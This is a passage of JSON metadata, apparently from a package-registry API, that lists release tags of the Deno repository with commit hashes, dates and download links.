noland%2Fdeno/tags/v2.9.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.4/manifests"},{"name":"v2.9.3","sha":"f39575ecd50602a5b42b1ba8e93849460de9fcf4","kind":"commit","published_at":"2026-07-15T13:38:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.3/manifests"},{"name":"v2.9.2","sha":"356c132ed60e679b34535a287a493193aa8bb6a4","kind":"commit","published_at":"2026-07-08T10:45:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.2/manifests"},{"name":"v2.9.1","sha":"7afe265234add47e7602f2e91c318f3eff245aa8","kind":"commit","published_at":"2026-07-01T13:28:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.1/manifests"},{"name":"v2.9.0","sha":"94d375ddd02b7b9eb464781e4bd9e68bf262aacc","kind":"commit","published_at":"2026-06-25T11:49:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.0/manifests"},{"name":"v2.8.3","sha":"ba699088698c7b4a2fbea33acc4dcd6571789452","kind":"commit","published_at":"2026-06-11T12:02:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.3/manifests"},{"name":"v2.8.2","sha":"085be0b5ff8ca3ccfe58318afe0939c4d4af9743","kind":"commit","published_at":"2026-06-03T11:51:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.2/manifests"},{"name":"v2.8.1","sha":"3e2030bc01776ce6b4ca355b1e78c4cb98c82dca","kind":"commit","published_at":"2026-05-27T10:23:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.1/manifests"},{"name":"v2.8.0","sha":"fbb5be31ac23ef40f51025d6aeaaa91d9f082e4a","kind":"commit","published_at":"2026-05-22T08:06:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.0/manifests"},{"name":"v2.7.14","sha":"2d674b25625bcc367853d00fe86f6e84390f88cb","kind":"commit","published_at":"2026-04-28T12:41:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.14/manifests"},{"name":"v2.7.13","sha":"eea91269eb83ff8065afe2e424c8fe78c4b1f448","kind":"commit","published_at":"2026-04-22T11:22:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.13/manifests"},{"name":"v2.7.12","sha":"825d2647dd0728723623623b6c7b00da7ddad10d","kind":"commit","published_at":"2026-04-09T18:18:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.12/manifests"},{"name":"v2.7.11","sha":"6ddbb099662ea78a62af79484ae773cd9058c815","kind":"commit","published_at":"2026-04-01T09:31:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.11/manifests"},{"name":"v2.7.10","sha":"fde6c9c11a5ae8e0dc85f8737b34be11d2aaef32","kind":"commit","published_at":"2026-03-31T12:34:37.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.10/manifests"},{"name":"v2.7.9","sha":"f065b072ab052602746b4be8da37ad90e51aee70","kind":"commit","published_at":"2026-03-27T10:37:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.9/manifests"},{"name":"v2.7.8","sha":"c394911f8edc7591de8da65c7b6690bcbc78afc1","kind":"commit","published_at":"2026-03-25T14:14:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.8/manifests"},{"name":"v2.7.7","sha":"8fa9085f90849222bd56facddc16ac288c8ee62e","kind":"commit","published_at":"2026-03-19T11:52:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.7/manifests"},{"name":"v2.7.6","sha":"ffbaf13c354a6433a66c2335ab16c4567d357be6","kind":"commit","published_at":"2026-03-18T10:27:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.6/manifests"},{"name":"v2.7.5","sha":"0238181e8a95be0885da93bbc99997988d07bff0","kind":"commit","published_at":"2026-03-11T09:51:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.5/manifests"},{"name":"v2.7.4","sha":"8274bf758236405d50046dbe31beba96b6d3d2f6","kind":"commit","published_at":"2026-03-05T12:10:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.4/manifests"},{"name":"v2.7.3","sha":"e78a7fa8d86848a759e6743537cf90013c7160b1","kind":"commit","published_at":"2026-03-04T14:23:37.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.3/manifests"},{"name":"v2.7.2","sha":"83e374686079a2f067115e60ad91ec38f4f6118b","kind":"commit","published_at":"2026-03-03T14:11:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.2/manifests"},{"name":"v2.7.1","sha":"1df618d969894353731981a17784816167ad82fb","kind":"commit","published_at":"2026-02-25T15:42:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.1/manifests"},{"name":"v2.7.0","sha":"fb4db333c37ec1242a6f80738510d214018fea53","kind":"commit","published_at":"2026-02-25T09:11:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.0/manifests"},{"name":"v2.6.10","sha":"8871ade7aa09eb907a04ee61a427f5ba14c54014","kind":"commit","published_at":"2026-02-17T14:05:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.10/manifests"},{"name":"v2.6.9","sha":"7a9888857e01c02417fd38144d4bf0ace73eb6ab","kind":"commit","published_at":"2026-02-10T14:53:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.9/manifests"},{"name":"v2.6.8","sha":"7ab62a769be154c0926fe8be640d48674eb79614","kind":"commit","published_at":"2026-02-02T13:42:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.8/manifests"},{"name":"v2.6.7","sha":"d155af667f0e57277dc992d1b9609d5e6712908d","kind":"commit","published_at":"2026-01-29T11:26:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.7/manifests"},{"name":"v2.5.7","sha":"8533c169419c6c92069cb5981a73ee9c36d19798","kind":"commit","published_at":"2026-01-27T16:21:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.7/manifests"},{"name":"v2.6.6","sha":"b9b87a6bfb61a5d8855ee1578620ac3a9393b6bb","kind":"commit","published_at":"2026-01-22T19:37:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.6/manifests"},{"name":"v2.6.5","sha":"c356d9a621fccad5047497238039cde10613b278","kind":"commit","published_at":"2026-01-15T11:11:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.5/manifests"},{"name":"v2.6.4","sha":"658638b3262a90c3e92fe96887fd898b5b1a78d7","kind":"commit","published_at":"2026-01-05T16:18:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.4/manifests"},{"name":"v2.6.3","sha":"3fbb1daddbc9333cddf0d8c0735811717dd70f7a","kind":"commit","published_at":"2025-12-20T11:07:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.3/manifests"},{"name":"v2.6.2","sha":"9cd8077757a365f2e9e36499c2330d2d4facbb2e","kind":"commit","published_at":"2025-12-19T14:04:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.2/manifests"},{"name":"v2.6.1","sha":"1ba09320aa4ef7362ec33ec332e6e6d38c75d2b5","kind":"commit","published_at":"2025-12-15T16:45:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.1/manifests"},{"name":"v2.6.0","sha":"d5b1548eba893d4cc26305f33739a6ca2e6e8c11","kind":"commit","published_at":"2025-12-10T13:29:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.0/manifests"},{"name":"v2.5.6","sha":"1b5f3112af364a3327b26f720746819c4f20f20d","kind":"commit","published_at":"2025-10-29T23:50:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.6/manifests"},{"name":"v2.5.5","sha":"367ecdd0360e935de0454c70e0018be61c02904e","kind":"commit","published_at":"2025-10-28T16:40:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.5/manifests"},{"name":"v2.5.4","sha":"6fbce91e40cc07fc6da74068e5cc56fdd40f7b4c","kind":"commit","published_at":"2025-10-09T09:41:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.4/manifests"},{"name":"v2.5.3","sha":"1c3d04cfaf50a4a0db7a1925c0a73af5ea89bc69","kind":"commit","published_at":"2025-10-03T02:05:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.3/manifests"},{"name":"v2.2.15","sha":"5f6b1329dfd377ff03a389fb32faf73bb966e81d","kind":"commit","published_at":"2025-09-30T18:12:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.15","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.15/manifests"},{"name":"v2.1.14","sha":"b8ae1323051c14a66a1c88434aa0f1e49f960c10","kind":"commit","published_at":"2025-09-29T15:06:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.14/manifests"},{"name":"v2.5.2","sha":"02787156398518fdac51b1f633a8367f92a7d253","kind":"commit","published_at":"2025-09-24T19:42:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.2/manifests"},{"name":"v2.5.1","sha":"4c1cdfc9a4f3c8919d25d1b2fe01981025babec5","kind":"commit","published_at":"2025-09-16T23:58:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.1/manifests"},{"name":"v2.5.0","sha":"c6adba122836aeddd92800c45282897e1f508bd3","kind":"commit","published_at":"2025-09-10T05:10:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.0/manifests"},{"name":"v2.4.5","sha":"b7061b0f64b3c79b312de5a59122b7184b2fdef2","kind":"commit","published_at":"2025-08-21T11:41:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.5/manifests"},{"name":"v2.4.4","sha":"5129d036ebd51b229adb7579e2c805859e3f95c0","kind":"commit","published_at":"2025-08-13T20:26:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.4/manifests"},{"name":"v2.4.3","sha":"5612d2edc7262d7bfb3bcfb0f18649b01ec94b53","kind":"commit","published_at":"2025-07-30T22:25:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.3/manifests"},{"name":"v2.4.2","sha":"622c3513936c1614ee316516a31343729c3c4367","kind":"commit","published_at":"2025-07-16T10:51:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.2/manifests"}